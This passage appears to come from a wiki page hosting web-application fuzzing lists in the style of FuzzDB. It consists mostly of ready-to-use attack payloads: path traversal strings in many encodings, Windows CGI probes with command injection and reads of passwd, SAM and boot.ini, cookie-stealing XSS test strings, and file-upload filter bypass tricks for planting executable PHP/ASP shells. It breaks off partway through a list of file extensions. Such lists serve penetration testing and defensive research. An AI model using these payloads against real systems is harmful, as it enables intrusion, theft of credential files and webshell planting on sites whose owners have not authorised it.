%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010)&lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
# PHP on Windows&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 10 April 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{PREFIX}/templates_compiled/&lt;br /&gt;
{PREFIX}/templates_c/&lt;br /&gt;
{PREFIX}/templates/&lt;br /&gt;
{PREFIX}/temporary/&lt;br /&gt;
{PREFIX}/images/&lt;br /&gt;
{PREFIX}/cache/&lt;br /&gt;
{PREFIX}/temp/&lt;br /&gt;
{PREFIX}/files/&lt;br /&gt;
{PREFIX}/tmp/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
